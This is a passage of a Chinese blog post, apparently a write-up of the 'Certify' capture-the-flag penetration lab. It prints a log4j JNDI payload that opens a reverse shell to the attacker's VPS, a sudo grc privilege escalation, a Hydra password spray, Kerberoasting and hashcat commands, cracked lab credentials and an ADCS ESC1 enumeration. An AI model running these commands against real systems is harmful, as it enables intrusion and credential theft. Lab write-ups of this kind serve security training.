{"id":2760,"date":"2023-10-06T23:46:52","date_gmt":"2023-10-06T15:46:52","guid":{"rendered":"https:\/\/fushuling.com\/?p=2760"},"modified":"2023-10-14T23:59:54","modified_gmt":"2023-10-14T15:59:54","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7certify","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/10\/06\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7certify\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Certify"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>log4j2 jndi<\/li>\n\n\n\n<li>grc\u63d0\u6743<\/li>\n\n\n\n<li>SMB<\/li>\n\n\n\n<li>\u5bc6\u7801\u55b7\u6d12<\/li>\n\n\n\n<li>spn<\/li>\n\n\n\n<li>ESC1<\/li>\n<\/ul>\n\n\n\n<p>\u7ed9\u7684ip\u8bbf\u95ee\u4e86\u6ca1\u670d\u52a1\uff0cfscan\u542f\u52a8<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan64.exe -h 39.99.154.173\r\n\r\n   ___                              _\r\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\r\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\r\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\r\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\r\n                     fscan version: 1.8.2\r\nstart infoscan\r\n(icmp) Target 39.99.154.173   is alive\r\n&#91;*] Icmp alive hosts len is: 1\r\n39.99.154.173:22 open\r\n39.99.154.173:80 open\r\n39.99.154.173:8983 open\r\n&#91;*] alive ports len is: 3\r\nstart vulscan\r\n&#91;*] WebTitle: http:\/\/39.99.154.173      code:200 len:612    title:Welcome to nginx!\r\n\u5df2\u5b8c\u6210 3\/3\r\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 1m24.5247609s<\/code><\/pre>\n\n\n\n<p>\u770b\u5230\u6709\u4e2a8983\uff0c\u8bbf\u95ee\u4e0a\u53bb\u662f\u4e00\u4e2asolar\u670d\u52a1\uff0c\u5e76\u4e14\u4f9d\u8d56\u91cc\u7528\u4e86log4j<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-13-1024x509.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"509\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-13-1024x509.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2762\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8bd5\u4e86\u4e0blog4j\uff0c\u53d1\u73b0\u80fd\u5916\u5e26\u8bf7\u6c42\uff0c\u6240\u4ee5\u786e\u5b9e\u6709\u6d1e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.154.173:8983\/solr\/admin\/collections?action=${jndi:ldap:\/\/941chl.dnslog.cn}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-5-1024x386.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"386\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-5-1024x386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2763\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7528<a href=\"https:\/\/github.com\/WhiteHSBG\/JNDIExploit\/releases\/tag\/v1.4\">JNDIExploit<\/a>\u76f4\u63a5\u5f00\u68ad<\/p>\n\n\n\n<p>\u5728\u81ea\u5df1vps\u4e0a\u8d77\u4e00\u4e2aldap\u670d\u52a1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPS_IP<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u5f39shell\u7684payload\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/solr\/admin\/collections?action=${jndi:ldap:\/\/VPS_IP:1389\/Basic\/ReverseShell\/VPS_IP\/9383} HTTP\/1.1\r\nHost: 39.99.154.173:8983\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-2-1024x454.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"454\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-2-1024x454.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2764\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0a\u53bb\u4e4b\u540e\u6ca1\u627e\u5230flag\uff0c\u800c\u4e14\u6743\u9650\u5f88\u4f4e\uff0c\u521b\u5efa\u6587\u4ef6\u5565\u7684\u90fd\u4e0d\u884c\uff0c\u8bf4\u660e\u8981\u63d0\u6743\u3002suid\u6ca1\u627e\u5230\uff0c\u4e0d\u8fc7sudo -l\u627e\u5230\u4e86grc\u547d\u4ee4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"182\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2765\"  sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><\/div><\/figure>\n\n\n\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/grc\/\">https:\/\/gtfobins.github.io\/gtfobins\/grc\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-1-1024x537.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"537\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-1-1024x537.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2766\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>sudo grc\u7136\u540e\u540e\u9762\u8ddf\u60f3\u8981\u6267\u884c\u7684\u547d\u4ee4\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo grc cat \/root\/flag01.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"699\" height=\"318\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2767\"  sizes=\"auto, (max-width: 699px) 100vw, 699px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740wget\u4e00\u4e0b\u9700\u8981\u7684\u8f6f\u4ef6\u7136\u540e\u626b\u5185\u7f51\u5efa\u4ee3\u7406<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>solr@ubuntu:\/home$ sudo grc .\/fscan -h 172.22.9.19\/24\r\nsudo grc .\/fscan -h 172.22.9.19\/24\r\n\r\n   ___                              _    \r\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \r\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\r\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \r\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \r\n                     fscan version: 1.8.2\r\nstart infoscan\r\n(icmp) Target 172.22.9.19     is alive\r\n(icmp) Target 172.22.9.7      is alive\r\n(icmp) Target 172.22.9.26     is alive\r\n(icmp) Target 172.22.9.47     is alive\r\n&#91;*] Icmp alive hosts len is: 4\r\n172.22.9.7:135 open\r\n172.22.9.26:135 open\r\n172.22.9.7:139 open\r\n172.22.9.26:139 open\r\n172.22.9.47:80 open\r\n172.22.9.7:80 open\r\n172.22.9.19:80 open\r\n172.22.9.19:22 open\r\n172.22.9.47:21 open\r\n172.22.9.47:22 open\r\n172.22.9.7:445 open\r\n172.22.9.47:139 open\r\n172.22.9.47:445 open\r\n172.22.9.26:445 open\r\n172.22.9.7:88 open\r\n172.22.9.19:8983 open\r\n&#91;*] alive ports len is: 16\r\nstart vulscan\r\n&#91;*] NetInfo:\r\n&#91;*]172.22.9.7\r\n   &#91;->]XIAORANG-DC\r\n   &#91;->]172.22.9.7\r\n&#91;*] WebTitle: http:\/\/172.22.9.19        code:200 len:612    title:Welcome to nginx!\r\n&#91;*] NetInfo:\r\n&#91;*]172.22.9.26\r\n   &#91;->]DESKTOP-CBKTVMO\r\n   &#91;->]172.22.9.26\r\n&#91;*] WebTitle: http:\/\/172.22.9.7         code:200 len:703    title:IIS Windows Server\r\n&#91;*] WebTitle: http:\/\/172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\r\n&#91;*] NetBios: 172.22.9.7      &#91;+]DC XIAORANG\\XIAORANG-DC     \r\n&#91;*] NetBios: 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393 \r\n&#91;*] WebTitle: http:\/\/172.22.9.19:8983   code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.22.9.19:8983\/solr\/\r\n&#91;*] NetBios: 172.22.9.47     fileserver                          Windows 6.1 \r\n&#91;*] 172.22.9.47  (Windows 6.1)\r\n&#91;*] WebTitle: http:\/\/172.22.9.19:8983\/solr\/ code:200 len:16555  title:Solr Admin\r\n&#91;+] http:\/\/172.22.9.7 poc-yaml-active-directory-certsrv-detect<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.9.7 XIAORANG-DC\n172.22.9.19 \u5df2\u62ff\u4e0b\n172.22.9.26 DESKTOP-CBKTVMO\n172.22.9.47 fileserver <\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3a\u8fd9\u4e2a\u9898\u9898\u76ee\u8003\u70b9\u90a3\u513f\u5199\u4e86\u4e2aSMB\uff0c\u4f30\u8ba1\u662f\u6709SMB\u670d\u52a1\uff0c\u90a3\u80af\u5b9a\u662ffileserver\u8fd9\u53f0ubuntu\u4e0a\u5b58\u5728(fscan\u626b\u4e0d\u51fa\u6765\u4f46\u662fnmap\u662f\u626b\u7684\u51fa\u6765\u7684)\uff0c\u7528smbclient\u8fde\u4e86\u4e00\u4e0b\u679c\u7136\u8fde\u4e0a\u53bb\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 smbclient.py 172.22.9.47<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"645\" height=\"356\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2768\"  sizes=\"auto, (max-width: 645px) 100vw, 645px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5728secret\u76ee\u5f55\u83b7\u5f97flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"655\" height=\"338\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2769\"  sizes=\"auto, (max-width: 655px) 100vw, 655px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u56de\u6839\u76ee\u5f55\u7528get personnel.db\u4e0b\u4e00\u4e0b\u8fd9\u4e2a\u6570\u636e\u5e93\uff0c\u770b\u4e86\u4e00\u4e0b\u6709\u4e2auser\u8868\u91cc\u6709\u5bc6\u7801\u4f46\u6ca1\u7528\u6237\u540d<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"807\" height=\"452\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2770\"  sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/div><\/figure>\n\n\n\n<p>\u53c8\u6709\u4e00\u4e2a\u8868\u6709\u4e00\u5806\u7528\u6237\u540d<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"970\" height=\"890\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2771\"  sizes=\"auto, (max-width: 970px) 100vw, 970px\" \/><\/div><\/figure>\n\n\n\n<p>\u663e\u7136\u662f\u60f3\u6211\u4eec\u7528\u5bc6\u7801\u55b7\u6d12\u4e00\u4e0b\uff0c\u6700\u6709\u53ef\u80fd\u6210\u529f\u7684\u5c31\u662f172.22.9.26\u8fd9\u53f0windows\u4e3b\u673a\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp >>result.txt\ncat result.txt|| grep account<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u6709\u6548\u7684\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>zhangjian:i9XDE02pLVf\r\nliupeng:fiAzGwEMgTY<\/code><\/pre>\n\n\n\n<p>\u4f46\u4fe9\u90fdrdp\u4e0d\u4e0a\u53bb\uff0c\u56de\u60f3\u63d0\u793a\u8bf4\u4e86\u4e2aspn\uff0c\u8bd5\u8bd5\u67e5\u627e\u4e0b\u57df\u7528\u6237\u4e0b\u7684spn<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab\/zhangjian:i9XDE02pLVf<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"714\" height=\"452\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2772\"  sizes=\"auto, (max-width: 714px) 100vw, 714px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f97\u5230\u4e86chenchen\u548czhangxia\u7684\u5bc6\u7801\u54c8\u5e0c\uff0chashcat\u7206\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -m 13100 -a 0 1.txt \/usr\/share\/wordlists\/rockyou.txt --force\r<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>zhangxia:MyPass2@@6\nchenchen:@Passw0rd@<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4fe9\u8d26\u6237\u7ec8\u4e8e\u80fdrdp\u4e0a\u53bb\u4e86\uff0c\u4f46\u662fflag\u5728\u7ba1\u7406\u5458\u76ee\u5f55\u4e0b\uff0c\u8fd8\u662f\u62ff\u4e0d\u5230\u3002\u56de\u770b\u9898\u76ee\u8003\u70b9\u91cc\u8bf4\u4e86\u4e2aAD CS\uff0c\u4f30\u8ba1\u662f\u8981\u62ff\u90a3\u53f0CA\u901a\u8fc7\u4ec0\u4e48\u8bc1\u4e66\u5229\u7528\u62ff\u57df\u63a7\uff0c\u5148\u679a\u4e3e\u4e00\u4e0b\u6709\u54ea\u4e9b\u8bc1\u4e66<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains certipy find -u 'liupeng@xiaorang.lab'  -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout\r<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Certificate Authorities\r\n  0\r\n    CA Name                             : xiaorang-XIAORANG-DC-CA\r\n    DNS Name                            : XIAORANG-DC.xiaorang.lab\r\n    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab\r\n    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5\r\n    Certificate Validity Start          : 2023-07-14 04:33:21+00:00\r\n    Certificate Validity End            : 2028-07-14 04:43:21+00:00\r\n    Web Enrollment                      : Disabled\r\n    User Specified SAN                  : Unknown\r\n    Request Disposition                 : Unknown\r\n    Enforce Encryption for Requests     : Unknown\r\nCertificate Templates\r\n  0\r\n    Template Name                       : XR Manager\r\n    Display Name                        : XR Manager\r\n    Certificate Authorities             : xiaorang-XIAORANG-DC-CA\r\n    Enabled                             : True\r\n    Client Authentication               : True\r\n    Enrollment Agent                    : False\r\n    Any Purpose                         : False\r\n    Enrollee Supplies Subject           : True\r\n    Certificate Name Flag               : EnrolleeSuppliesSubject\r\n    Enrollment Flag                     : PublishToDs\r\n                                          IncludeSymmetricAlgorithms\r\n    Private Key Flag                    : 16777216\r\n                                          65536\r\n                                          ExportableKey\r\n    Extended Key Usage                  : Encrypting File System\r\n                                          Secure Email\r\n                                          Client Authentication\r\n    Requires Manager Approval           : False\r\n    Requires Key Archival               : False\r\n    Authorized Signatures Required      : 0\r\n    Validity Period                     : 1 year\r\n    Renewal Period                      : 6 weeks\r\n    Minimum RSA Key Length              : 2048\r\n    Permissions\r\n      Enrollment Permissions\r\n        Enrollment Rights               : XIAORANG.LAB\\Domain Admins\r\n                                          XIAORANG.LAB\\Domain Users\r\n                                          XIAORANG.LAB\\Enterprise Admins\r\n                                          XIAORANG.LAB\\Authenticated Users\r\n      Object Control Permissions\r\n        Owner                           : XIAORANG.LAB\\Administrator\r\n        Write Owner Principals          : XIAORANG.LAB\\Domain Admins\r\n                                          XIAORANG.LAB\\Enterprise Admins\r\n                                          XIAORANG.LAB\\Administrator\r\n        Write Dacl Principals           : XIAORANG.LAB\\Domain Admins\r\n                                          XIAORANG.LAB\\Enterprise Admins\r\n                                          XIAORANG.LAB\\Administrator\r\n        Write Property Principals       : XIAORANG.LAB\\Domain Admins\r\n                                          XIAORANG.LAB\\Enterprise Admins\r\n                                          XIAORANG.LAB\\Administrator\r\n    &#91;!] Vulnerabilities\r\n      ESC1                              : 'XIAORANG.LAB\\\\Domain Users' and 'XIAORANG.LAB\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication<\/code><\/pre>\n\n\n\n<p>\u76f4\u63a5\u5c31\u626b\u51fa\u6765\u6709ESC1\u4e86\uff0c\u4e00\u773c\u4e01\u771f\u4e86\u5c5e\u4e8e\u662f\uff0c\u7167\u7740\u522b\u4eba\u7684\u6587\u7ae0\u76f4\u63a5\u5f00\u6253\uff1a<a href=\"https:\/\/blog.csdn.net\/Adminxe\/article\/details\/129353293\">ADCS\u653b\u51fb\u4e4b\u8bc1\u4e66\u6a21\u677f\u914d\u7f6e\u9519\u8bef ESC1<\/a>\u3002\u548c\u4ed6\u90a3\u4e2a\u6f14\u793a\u4e0d\u4e00\u6837\u7684\u5c31\u662f\u6211\u4eec\u8fd9\u91cc\u7528\u7684Certificate Templates\u662fXR Manager\u4ee5\u53caca\u662fxiaorang-XIAORANG-DC-CA\uff0c\u5176\u4ed6\u90fd\u5dee\u4e0d\u591a\uff0c\u76f4\u63a5\u5f00\u6253\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u6ce8\u610f\u6539\u4e00\u4e0bhost\uff0c\u6ca1\u6539host\u8fde\u63a5\u4f1a\u8d85\u65f6\uff0c\u6211\u53cd\u6b63\u628a\u57df\u91cc\u8fd9\u4e24\u53f0\u90fd\u52a0\u4e0a\u53bb\u4e86(\u6700\u540e\u4e24\u6761)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15.png'><img class=\"lazyload 